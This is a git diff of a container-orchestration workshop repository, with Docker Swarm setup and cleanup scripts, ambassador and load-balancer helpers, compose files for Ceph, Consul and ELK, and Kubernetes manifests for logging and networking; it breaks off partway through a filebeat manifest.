# Get all services in our compose application.
containers_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=com.docker.compose.project={}".format(project_name),
"--format", '{{ .ID }} {{ .Label "com.docker.compose.service" }}',
])
# Get all existing ambassadors for this application.
ambassadors_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=ambassador.project={}".format(project_name),
"--format", '{{ .ID }} '
'{{ .Label "ambassador.container" }} '
'{{ .Label "ambassador.service" }}',
])
# Build a set of existing ambassadors.
ambassadors = dict()
for ambassador in ambassadors_data.split('\n'):
if not ambassador:
continue
ambassador_id, container_id, linked_service = ambassador.split()
ambassadors[container_id, linked_service] = ambassador_id
operations = []
# Start the missing ambassadors.
for container in containers_data.split('\n'):
if not container:
continue
container_id, service_name = container.split()
extra_hosts = config.services[service_name].get("extra_hosts", {})
for linked_service, bind_address in extra_hosts.items():
description = "Ambassador {}/{}/{}".format(
service_name, container_id, linked_service)
ambassador_id = ambassadors.pop((container_id, linked_service), None)
if ambassador_id:
print("{} already exists: {}".format(description, ambassador_id))
else:
print("{} not found, creating it.".format(description))
operations.append([
description,
"docker", "run", "-d",
"--net", "container:{}".format(container_id),
"--label", "ambassador.project={}".format(project_name),
"--label", "ambassador.container={}".format(container_id),
"--label", "ambassador.service={}".format(linked_service),
"--label", "ambassador.bindaddr={}".format(bind_address),
"jpetazzo/hamba", "run"
])
# Destroy extraneous ambassadors.
for ambassador_id in ambassadors.values():
print("{} is not useful anymore, destroying it.".format(ambassador_id))
operations.append([
"rm -f {}".format(ambassador_id),
"docker", "rm", "-f", ambassador_id,
])
# Execute all commands in parallel.
parallel_run(operations, 10)

3
bin/delete-ambassadors.sh Executable file
View File

@@ -0,0 +1,3 @@
#!/bin/sh
docker ps -q --filter label=ambassador.project=dockercoins |
xargs docker rm -f

16
bin/fixup-yaml.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/bin/sh
# Some tools will choke on the YAML files generated by PyYAML;
# in particular on a section like this one:
#
# service:
# ports:
# - 8000:5000
#
# This script adds two spaces in front of the dash in those files.
# Warning: it is a hack, and probably won't work on some YAML files.
[ -f "$COMPOSE_FILE" ] || {
echo "Cannot find COMPOSE_FILE"
exit 1
}
sed -i 's/^ -/ -/' $COMPOSE_FILE

38
bin/link-to-ambassadors.py Executable file
View File

@@ -0,0 +1,38 @@
#!/usr/bin/env python
from common import ComposeFile
import yaml
config = ComposeFile()
# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))
def generate_local_addr():
last_byte = 2
while last_byte<255:
yield "127.127.0.{}".format(last_byte)
last_byte += 1
for service_name, service in config.services.items():
if "links" in service:
for link, local_addr in zip(service["links"], generate_local_addr()):
if link not in ports:
print("Skipping link {} in service {} "
"(no port mapping defined). "
"Your code will probably break."
.format(link, service_name))
continue
if "extra_hosts" not in service:
service["extra_hosts"] = {}
service["extra_hosts"][link] = local_addr
del service["links"]
if "ports" in service:
del service["ports"]
if "volumes" in service:
del service["volumes"]
if service_name in ports:
service["ports"] = [ ports[service_name] ]
config.save()

View File

@@ -0,0 +1,46 @@
#!/usr/bin/env python
# FIXME: hardcoded
PORT="80"
import os
import subprocess
project_name = os.path.basename(os.path.realpath("."))
# Get all existing services for this application.
containers_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=com.docker.compose.project={}".format(project_name),
"--format", '{{ .Label "com.docker.compose.service" }} '
'{{ .Label "com.docker.compose.container-number" }} '
'{{ .Label "loadbalancer" }}',
])
load_balancers = dict()
for line in containers_data.split('\n'):
if not line:
continue
service_name, container_number, load_balancer = line.split(' ')
if load_balancer:
if load_balancer not in load_balancers:
load_balancers[load_balancer] = []
load_balancers[load_balancer].append((service_name, int(container_number)))
for load_balancer, backends in load_balancers.items():
# FIXME: iterate on all load balancers
container_name = "{}_{}_1".format(project_name, load_balancer)
command = [
"docker", "run", "--rm",
"--volumes-from", container_name,
"--net", "container:{}".format(container_name),
"jpetazzo/hamba", "reconfigure", PORT,
]
command.extend(
"{}_{}_{}:{}".format(project_name, backend_name, backend_number, PORT)
for (backend_name, backend_number) in sorted(backends)
)
print("Updating configuration for {} with {} backend(s)..."
.format(container_name, len(backends)))
subprocess.check_output(command)

201
bin/setup-all-the-things.sh Executable file
View File

@@ -0,0 +1,201 @@
#!/bin/sh
unset DOCKER_REGISTRY
unset DOCKER_HOST
unset COMPOSE_FILE
SWARM_IMAGE=${SWARM_IMAGE:-swarm}
prepare_1_check_ssh_keys () {
for N in $(seq 1 5); do
ssh node$N true
done
}
prepare_2_compile_swarm () {
cd ~
git clone git://github.com/docker/swarm
cd swarm
[[ -z "$1" ]] && {
echo "Specify which revision to build."
return
}
git checkout "$1" || return
mkdir -p image
docker build -t docker/swarm:$1 .
docker run -i --entrypoint sh docker/swarm:$1 \
-c 'cat $(which swarm)' > image/swarm
chmod +x image/swarm
cat >image/Dockerfile <<EOF
FROM scratch
COPY ./swarm /swarm
ENTRYPOINT ["/swarm", "-debug", "-experimental"]
EOF
docker build -t jpetazzo/swarm:$1 image
docker login
docker push jpetazzo/swarm:$1
docker logout
SWARM_IMAGE=jpetazzo/swarm:$1
}
clean_1_containers () {
for N in $(seq 1 5); do
ssh node$N "docker ps -aq | xargs -r -n1 -P10 docker rm -f"
done
}
clean_2_volumes () {
for N in $(seq 1 5); do
ssh node$N "docker volume ls -q | xargs -r docker volume rm"
done
}
clean_3_images () {
for N in $(seq 1 5); do
ssh node$N "docker images | awk '/dockercoins|jpetazzo/ {print \$1\":\"\$2}' | xargs -r docker rmi -f"
done
}
clean_4_machines () {
rm -rf ~/.docker/machine/
}
clean_all () {
clean_1_containers
clean_2_volumes
clean_3_images
clean_4_machines
}
dm_swarm () {
eval $(docker-machine env node1 --swarm)
}
dm_node1 () {
eval $(docker-machine env node1)
}
setup_1_swarm () {
grep node[12345] /etc/hosts | grep -v ^127 |
while read IPADDR NODENAME; do
docker-machine create --driver generic \
--engine-opt cluster-store=consul://localhost:8500 \
--engine-opt cluster-advertise=eth0:2376 \
--swarm --swarm-master --swarm-image $SWARM_IMAGE \
--swarm-discovery consul://localhost:8500 \
--swarm-opt replication --swarm-opt advertise=$IPADDR:3376 \
--generic-ssh-user docker --generic-ip-address $IPADDR $NODENAME
done
}
setup_2_consul () {
IPADDR=$(ssh node1 ip a ls dev eth0 |
sed -n 's,.*inet \(.*\)/.*,\1,p')
for N in 1 2 3 4 5; do
ssh node$N -- docker run -d --restart=always --name consul_node$N \
-e CONSUL_BIND_INTERFACE=eth0 --net host consul \
agent -server -retry-join $IPADDR -bootstrap-expect 5 \
-ui -client 0.0.0.0
done
}
setup_3_wait () {
# Wait for a Swarm master
dm_swarm
while ! docker ps; do sleep 1; done
# Wait for all nodes to be there
while ! [ "$(docker info | grep "^Nodes:")" = "Nodes: 5" ]; do sleep 1; done
}
setup_4_registry () {
cd ~/orchestration-workshop/registry
dm_swarm
docker-compose up -d
for N in $(seq 2 5); do
docker-compose scale frontend=$N
done
}
setup_5_btp_dockercoins () {
cd ~/orchestration-workshop/dockercoins
dm_node1
export DOCKER_REGISTRY=localhost:5000
cp docker-compose.yml-v2 docker-compose.yml
~/orchestration-workshop/bin/build-tag-push.py | tee /tmp/btp.log
export $(tail -n 1 /tmp/btp.log)
}
setup_6_add_lbs () {
cd ~/orchestration-workshop/dockercoins
~/orchestration-workshop/bin/add-load-balancer-v2.py rng
~/orchestration-workshop/bin/add-load-balancer-v2.py hasher
}
setup_7_consulfs () {
dm_swarm
docker pull jpetazzo/consulfs
for N in $(seq 1 5); do
ssh node$N "docker run --rm -v /usr/local/bin:/target jpetazzo/consulfs"
ssh node$N mkdir -p ~/consul
ssh -f node$N "mountpoint ~/consul || consulfs localhost:8500 ~/consul"
done
}
setup_8_syncmachine () {
while ! mountpoint ~/consul; do
sleep 1
done
cp -r ~/.docker/machine ~/consul/
for N in $(seq 2 5); do
ssh node$N mkdir -p ~/.docker
ssh node$N "[ -L ~/.docker/machine ] || ln -s ~/consul/machine ~/.docker"
done
}
setup_9_elk () {
dm_swarm
cd ~/orchestration-workshop/elk
docker-compose up -d
for N in $(seq 1 5); do
docker-compose scale logstash=$N
done
}
setup_all () {
setup_1_swarm
setup_2_consul
setup_3_wait
setup_4_registry
setup_5_btp_dockercoins
setup_6_add_lbs
setup_7_consulfs
setup_8_syncmachine
dm_swarm
}
force_remove_network () {
dm_swarm
NET="$1"
for CNAME in $(docker network inspect $NET | grep Name | grep -v \"$NET\" | cut -d\" -f4); do
echo $CNAME
docker network disconnect -f $NET $CNAME
done
docker network rm $NET
}
demo_1_compose_up () {
dm_swarm
cd ~/orchestration-workshop/dockercoins
docker-compose up -d
}
grep -qs -- MAGICMARKER "$0" && { # Don't display this line in the function list
echo "You should source this file, then invoke the following functions:"
grep -- '^[a-z].*{$' "$0" | cut -d" " -f1
}
show_swarm_primary () {
dm_swarm
docker info 2>/dev/null | grep -e ^Role -e ^Primary
}
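As the note near the end of the script says, it is meant to be sourced rather than executed; a usage sketch (function names taken from the file above, path assumed to be the repository checkout):
```
# Source the helper functions, then run the full setup and check the Swarm primary.
. bin/setup-all-the-things.sh
setup_all
show_swarm_primary
```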

View File

@@ -0,0 +1,12 @@
version: "2"
services:
cadvisor:
image: google/cadvisor
ports:
- "8080:8080"
volumes:
- "/:/rootfs:ro"
- "/var/run:/var/run:rw"
- "/sys:/sys:ro"
- "/var/lib/docker/:/var/lib/docker:ro"

19
ceph/README.md Normal file
View File

@@ -0,0 +1,19 @@
# CEPH on Docker
Note: this doesn't quite work yet.
The OSD containers need to be started twice (the first time, they fail
to initialize; the second time is a champ).
Also, it looks like you need at least two OSD containers (or the OSD
container should have two disks/directories, whatever).
RadosGw is listening on port 8080.
The `admin` container will create a `docker` user using `radosgw-admin`.
If you run it multiple times, that's OK: further invocations are idempotent.
Last but not least: it looks like AWS CLI uses a new signature format
that doesn't work with RadosGW. After almost two hours trying to figure
out what was wrong, I tried the S3 credentials directly with boto and
it worked immediately (I was able to create a bucket).
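For the record, a rough sketch of that boto test (boto 2.x; the credentials come from the `radosgw-admin user create` output mentioned above, and the host/port are assumptions matching the RadosGW port stated earlier):
```python
# Connect straight to RadosGW's S3 endpoint and create a bucket.
import boto
from boto.s3.connection import OrdinaryCallingFormat

conn = boto.connect_s3(
    aws_access_key_id="<access key from radosgw-admin>",
    aws_secret_access_key="<secret key from radosgw-admin>",
    host="localhost", port=8080,          # RadosGW listens on 8080
    is_secure=False,
    calling_format=OrdinaryCallingFormat(),
)
print(conn.create_bucket("testbucket"))
```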

53
ceph/docker-compose.yml Normal file
View File

@@ -0,0 +1,53 @@
version: "2"
services:
mon:
image: ceph/daemon
command: mon
environment:
CEPH_PUBLIC_NETWORK: 10.33.0.0/16
MON_IP: 10.33.0.2
osd:
image: ceph/daemon
command: osd_directory
depends_on:
- mon
volumes_from:
- mon
volumes:
- /var/lib/ceph/osd
mds:
image: ceph/daemon
command: mds
environment:
CEPHFS_CREATE: 1
depends_on:
- mon
volumes_from:
- mon
rgw:
image: ceph/daemon
command: rgw
depends_on:
- mon
volumes_from:
- mon
environment:
CEPH_OPTS: --verbose
admin:
image: ceph/daemon
entrypoint: radosgw-admin
depends_on:
- mon
volumes_from:
- mon
command: user create --uid=docker --display-name=docker
networks:
default:
ipam:
driver: default
config:
- subnet: 10.33.0.0/16
gateway: 10.33.0.1

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
tier: node
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
tier: node
name: kube-router
namespace: kube-system
spec:
template:
metadata:
labels:
k8s-app: kube-router
tier: node
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

12
consul/docker-compose.yml Normal file
View File

@@ -0,0 +1,12 @@
version: "2"
services:
bootstrap:
image: jpetazzo/consul
command: agent -server -bootstrap
container_name: bootstrap
server:
image: jpetazzo/consul
command: agent -server -join bootstrap -join server
client:
image: jpetazzo/consul
command: members -rpc-addr server:8400

View File

@@ -1,5 +1,5 @@
FROM ruby:alpine
RUN apk add --update build-base curl
RUN apk add --update build-base
RUN gem install sinatra
RUN gem install thin
ADD hasher.rb /

View File

@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80, threaded=False)
app.run(host="0.0.0.0", port=80)

View File

@@ -50,7 +50,7 @@ function refresh () {
points.push({ x: s2.now, y: speed });
}
$("#speed").text("~" + speed.toFixed(1) + " hashes/second");
var msg = ("I'm attending a @docker orchestration workshop, "
var msg = ("I'm attending the @docker workshop at #LinuxCon, "
+ "and my #DockerCoins mining rig is crunching "
+ speed.toFixed(1) + " hashes/second! W00T!");
$("#tweet").attr(

9
docs/chat/index.html Normal file
View File

@@ -0,0 +1,9 @@
<html>
<!-- Generated with index.html.sh -->
<head>
<meta http-equiv="refresh" content="0; URL='https://dockercommunity.slack.com/messages/docker-mentor'" />
</head>
<body>
<a href="https://dockercommunity.slack.com/messages/docker-mentor">https://dockercommunity.slack.com/messages/docker-mentor</a>
</body>
</html>

16
docs/chat/index.html.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/bin/sh
#LINK=https://gitter.im/jpetazzo/workshop-20170322-sanjose
LINK=https://dockercommunity.slack.com/messages/docker-mentor
#LINK=https://usenix-lisa.slack.com/messages/docker
sed "s,@@LINK@@,$LINK,g" >index.html <<EOF
<html>
<!-- Generated with index.html.sh -->
<head>
<meta http-equiv="refresh" content="0; URL='$LINK'" />
</head>
<body>
<a href="$LINK">$LINK</a>
</body>
</html>
EOF

BIN
docs/extra-details.png Normal file

Binary file not shown (new image, 11 KiB).

19
docs/extract-section-titles.py Executable file
View File

@@ -0,0 +1,19 @@
#!/usr/bin/env python
"""
Extract and print level 1 and 2 titles from workshop slides.
"""
separators = [
"---",
"--"
]
slide_count = 1
for line in open("index.html"):
line = line.strip()
if line in separators:
slide_count += 1
if line.startswith('# '):
print slide_count, '# #', line
elif line.startswith('## '):
print slide_count, line

7557
docs/index.html Normal file

File diff suppressed because it is too large.

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,90 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: consul
labels:
app: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
labels:
app: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
rules:
- apiGroups:
- ""
resources:
- pods
- namespaces
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:
kind: ClusterRole
name: fluentd
apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
labels:
app: fluentd
spec:
template:
metadata:
labels:
app: fluentd
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
- name: FLUENT_ELASTICSEARCH_PORT
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
volumeMounts:
- name: varlog
mountPath: /var/log
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
terminationGracePeriodSeconds: 30
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: elasticsearch
name: elasticsearch
spec:
selector:
matchLabels:
app: elasticsearch
template:
metadata:
labels:
app: elasticsearch
spec:
containers:
- image: elasticsearch:5
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
labels:
app: elasticsearch
name: elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: kibana
name: kibana
spec:
selector:
matchLabels:
app: kibana
template:
metadata:
labels:
app: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
name: kibana
resources: {}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: kibana
name: kibana
spec:
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
